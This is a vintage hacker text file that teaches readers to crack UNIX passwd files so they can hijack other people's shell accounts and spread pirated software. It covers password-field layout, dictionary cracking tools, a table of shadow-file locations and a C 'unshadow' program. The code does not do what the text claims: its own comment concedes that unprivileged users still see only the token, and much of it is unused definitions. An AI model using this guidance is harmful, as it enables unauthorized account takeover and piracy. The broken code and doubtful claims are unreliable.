+----------------------------------------------------------------------------+
¦ Author(s): ¦ Krypto ¦
+---------------+------------------------------------------------------------¦
¦ Subject: ¦ Cracking that "Passwd" File ¦
+----------------------------------------------------------------------------+
______________________________________________________________________________
______________________________________________________________________________
+----------------------------------------------------------------------------+
¦ R E A L I T Y C H E C K N E T W O R K! ¦
+----------------------------------------------------------------------------¦
¦____________________________________________________________________________¦
¦____________________________________________________________________________¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ I'm not an amazing "3l33t3" hacker, but I have picked up some things ¦
¦ over the course of my scene life. ¦
¦ ¦
¦ At times, many of us are without an Internet shell account, which ¦
¦ limits our ability to spread the warez. Many of us seek to remedy this ¦
¦ by cracking Internet shell accounts and doing as we please with them, ¦
¦ mainly spreading. Here, I'll show you the basic process of cracking ¦
¦ UNIX accounts so that you can better your efforts in spreading them ¦
¦ warez. ¦
¦ ¦
¦ Most Internet shells are UNIX based and therefore store the passwords ¦
¦ of all users in a file called the "passwd" file, usually located at ¦
¦ /etc/passwd. Each line of the passwd file has the following ¦
¦ structure: ¦
¦ ¦
¦ bgates:VKa0XuF8KB4sc:5604:12:William Gates:/home/bgates:/bin/bash ¦
¦ ¦
¦ Essentially, the line is broken down into these parts: ¦
¦ ¦
¦ Username: bgates ¦
¦ Encrypted Password: VKa0XuF8KB4sc ¦
¦ User number: 5604 ¦
¦ Group Number: 12 ¦
¦ Real Name (usually): William Gates ¦
¦ Home Directory: /home/bgates ¦
¦ Type of Shell: /bin/bash ¦
¦ ¦
¦ Your main concern is to crack the encrypted password of every user. ¦
¦ Because the encryption function is one-way, you cannot decrypt the ¦
¦ encrypted password. Instead you run a cracking program that encrypts ¦
¦ words from a list and compares each result with the stored encrypted ¦
¦ password. If they match, you have cracked the password. ¦
¦ ¦
¦ Because cracking relies on encrypting candidate words, you MUST have a ¦
¦ wordlist. For beginners, a basic wordlist can be found in the dictionary ¦
¦ file supplied as part of UNIX. The more comprehensive the wordlist is, ¦
¦ the better your chances of successfully cracking passwords. Next, ¦
¦ you'll need a passwd cracker, which comes in numerous versions ¦
¦ depending on your operating system. Currently the best are: ¦
¦ ¦
¦ Software                 Operating System ¦
¦ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ¦
¦ CrackerJack v1.4         DOS ¦
¦ Crack                    UNIX ¦
¦ ¦
¦ Run the cracking program, feed it your wordlist and passwd file, and ¦
¦ watch as it cracks the passwords. ¦
¦ ¦
¦ Sometimes you'll discover that the passwd file is incomplete or ¦
¦ looks something like this: ¦
¦ ¦
¦ bgates:*:5604:12:William Gates:/home/bgates:/bin/bash ¦
¦ ¦
¦ The * is called the token and means that the passwd file has been ¦
¦ shadowed. Password shadowing is a security system where the encrypted ¦
¦ password field of /etc/passwd is replaced with a special token and the ¦
¦ encrypted password is stored in a separate file which is not readable by ¦
¦ normal system users. ¦
¦ ¦
¦ In order to defeat this, you'll need to write and compile a C program ¦
¦ similar to the one at the bottom: ¦
¦ ¦
¦ Cut out the program at the bottom and save it as "shadow.c" ¦
¦ ¦
¦ Run "gcc shadow.c -o shadow" or "cc shadow.c -o shadow" ¦
¦ ¦
¦ Run "./shadow >> password" ¦
¦ ¦
¦ "password" should now be your deshadowed password list. ¦
¦ ¦
¦ If you have any problems, or need any help whatsoever... DO NOT ¦
¦ CONTACT ME! ¦
¦ ¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ Sample Unshadow Program ¦
¦ ~~~~~~~~~~~~~~~~~~~~~~~ ¦
¦ ¦
¦ #include <stdio.h> ¦
¦ #include <pwd.h>   /* struct passwd, getpwent(3), setpwent(3), endpwent(3) */ ¦
¦ ¦
¦ /* Legacy BSD layout of a password entry (see getpwent(3)). Kept for ¦
¦    reference only; the code below uses the system's own struct passwd. */ ¦
¦ struct SHADOWPW { ¦
¦     char *pw_name; ¦
¦     char *pw_passwd; ¦
¦     int   pw_uid; ¦
¦     int   pw_gid; ¦
¦     int   pw_quota; ¦
¦     char *pw_comment; ¦
¦     char *pw_gecos; ¦
¦     char *pw_dir; ¦
¦     char *pw_shell; ¦
¦ }; ¦
¦ ¦
¦ #ifdef elxsi ¦
¦ ¦
¦ /* Name of the shadow password file. Contains password and aging info */ ¦
¦ ¦
¦ #define SHADOWPW     "/etc/shadowpw" ¦
¦ #define SHADOWPW_PAG "/etc/shadowpw.pag" ¦
¦ #define SHADOWPW_DIR "/etc/shadowpw.dir" ¦
¦ /* ¦
¦  * Shadow password file pwd->pw_gecos field contains: ¦
¦  * ¦
¦  * <type>,<period>,<last_time>,<old_time>,<old_password> ¦
¦  * ¦
¦  * <type>         = Type of password criteria to enforce (type int). ¦
¦  *                  BSD_CRIT (0), normal BSD. ¦
¦  *                  STR_CRIT (1), strong passwords. ¦
¦  * <period>       = Password aging period (type long). ¦
¦  *                  0, no aging. ¦
¦  *                  else, number of seconds in aging period. ¦
¦  * <last_time>    = Time (seconds from epoch) of the last password ¦
¦  *                  change (type long). ¦
¦  *                  0, never changed. ¦
¦  * <old_time>     = Time (seconds from epoch) that the current password ¦
¦  *                  was made the <old_password> (type long). ¦
¦  *                  0, never changed. ¦
¦  * <old_password> = Password (encrypted) saved for an aging <period> to ¦
¦  *                  prevent reuse during that period (type char [20]). ¦
¦  *                  "*******", no <old_password>. ¦
¦  */ ¦
¦ ¦
¦ /* number of tries to change an aged password */ ¦
¦ ¦
¦ #define CHANGE_TRIES 3 ¦
¦ ¦
¦ /* program to execute to change passwords */ ¦
¦ ¦
¦ #define PASSWD_PROG "/bin/passwd" ¦
¦ ¦
¦ /* Name of the password aging exempt user names file and max number of entries */ ¦
¦ ¦
¦ #define EXEMPTPW   "/etc/exemptpw" ¦
¦ #define MAX_EXEMPT 100 ¦
¦ ¦
¦ /* Password criteria to enforce */ ¦
¦ ¦
¦ #define BSD_CRIT 0   /* Normal BSD password criteria */ ¦
¦ #define STR_CRIT 1   /* Strong password criteria */ ¦
¦ #define MAX_CRIT 1 ¦
¦ #endif /* elxsi */ ¦
¦ ¦
¦ /* Print one entry in the seven-field passwd format shown above */ ¦
¦ static void printpw(const struct passwd *a) ¦
¦ { ¦
¦     printf("%s:%s:%ld:%ld:%s:%s:%s\n", ¦
¦            a->pw_name, a->pw_passwd, (long)a->pw_uid, (long)a->pw_gid, ¦
¦            a->pw_gecos, a->pw_dir, a->pw_shell); ¦
¦ } ¦
¦ ¦
¦ int main(void) ¦
¦ { ¦
¦     struct passwd *p; ¦
¦ ¦
¦     setpwent();                 /* start at the first account */ ¦
¦     /* getpwent(3) walks every account; on a shadowed system an ¦
¦        unprivileged caller still only gets the token in pw_passwd */ ¦
¦     while ((p = getpwent()) != NULL) ¦
¦         printpw(p); ¦
¦     endpwent(); ¦
¦     return 0; ¦
¦ } ¦
¦ ¦
¦ /* SunOS 5.0     /etc/shadow */ ¦
¦ /* SunOS4.1+c2   /etc/security/passwd.adjunct */ ¦
¦ ¦
+----------------------------------------------------------------------------¦
¦ ¦
¦ The passwd file is located at the following paths on each system. ¦
¦ To determine your UNIX system type, enter the following at the UNIX ¦
¦ prompt: ¦
¦ ¦
¦ uname -a ¦
¦ ¦
¦ UNIX Paths (Courtesy of 2600) ¦
¦ ¦
¦ UNIX                    Path                                    Token ¦
¦ ----------------------------------------------------------------------- ¦
¦ AIX 3                   /etc/security/passwd                    ! ¦
¦   or                    /tcb/auth/files/<first letter           # ¦
¦                           of username>/<username> ¦
¦ A/UX 3.0s               /tcb/files/auth/?/* ¦
¦ BSD4.3-Reno             /etc/master.passwd                      * ¦
¦ ConvexOS 10             /etc/shadpw                             * ¦
¦ ConvexOS 11             /etc/shadow                             * ¦
¦ DG/UX                   /etc/tcb/aa/user/                       * ¦
¦ EP/IX                   /etc/shadow                             x ¦
¦ HP-UX                   /.secure/etc/passwd                     * ¦
¦ IRIX 5                  /etc/shadow                             x ¦
¦ Linux 1.1               /etc/shadow                             * ¦
¦ OSF/1                   /etc/passwd[.dir|.pag]                  * ¦
¦ SCO Unix #.2.x          /tcb/auth/files/<first letter           * ¦
¦                           of username>/<username> ¦
¦ SunOS4.1+c2             /etc/security/passwd.adjunct            ##username ¦
¦ SunOS 5.0               /etc/shadow ¦
¦                         <optional NIS+ private secure maps/tables/whatever> ¦
¦ System V Release 4.0    /etc/shadow                             x ¦
¦ System V Release 4.2    /etc/security/* database ¦
¦ Ultrix 4                /etc/auth[.dir|.pag]                    * ¦
¦ UNICOS                  /etc/udb                                * ¦
¦ ¦
¦ Well-secured systems with shadowed passwords will cause a ¦
¦ segmentation fault once you've run that sample program. Remember, don't ¦
¦ come bugging me on IRC if your little hacking escapade doesn't turn out ¦
¦ like you wanted it to. Well, that's all for now, enjoy your newly ¦
¦ hacked UNIX accounts and spread them warez. ¦
¦ ¦
+----------------------------------------------------------------------------¦